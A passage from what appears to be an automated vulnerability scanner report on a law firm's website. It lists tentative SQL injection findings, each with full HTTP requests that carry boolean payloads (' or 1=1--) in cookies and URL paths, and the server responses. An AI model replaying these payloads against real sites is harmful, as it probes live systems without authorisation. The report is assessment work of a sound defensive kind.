<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.75. http://www.pillsburylaw.com/index.cfm [hubspotvm cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hubspotvm cookie appears to be vulnerable to SQL injection attacks. The payloads 15781207'%20or%201%3d1--%20 and 15781207'%20or%201%3d2--%20 were each submitted in the hubspotvm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee515781207'%20or%201%3d1--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVM=;expires=Wed, 12-May-2010 16:45:45 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee515781207'%20or%201%3d2--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.76. http://www.pillsburylaw.com/index.cfm [hubspotvw cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hubspotvw cookie appears to be vulnerable to SQL injection attacks. The payloads 18340356'%20or%201%3d1--%20 and 18340356'%20or%201%3d2--%20 were each submitted in the hubspotvw cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee518340356'%20or%201%3d1--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVW=;expires=Wed, 12-May-2010 16:45:37 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee518340356'%20or%201%3d2--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.77. http://www.pillsburylaw.com/scripts/general.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/general.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 18146897'%20or%201%3d1--%20 and 18146897'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts18146897'%20or%201%3d1--%20/general.css?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:14:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts18146897'%20or%201%3d2--%20/general.css?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:14:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...
1.78. http://www.pillsburylaw.com/scripts/general.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/general.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 41613986'%20or%201%3d1--%20 and 41613986'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/general.css41613986'%20or%201%3d1--%20?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:14:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /scripts/general.css41613986'%20or%201%3d2--%20?v=20110202 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/
Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:14:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...
1.79. http://www.pillsburylaw.com/scripts/images/arrows-default.png [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /scripts/images/arrows-default.png

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 92255674%20or%201%3d1--%20 and 92255674%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/images/arrows-default.png HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/scripts/anythingslider/anythingslider.css
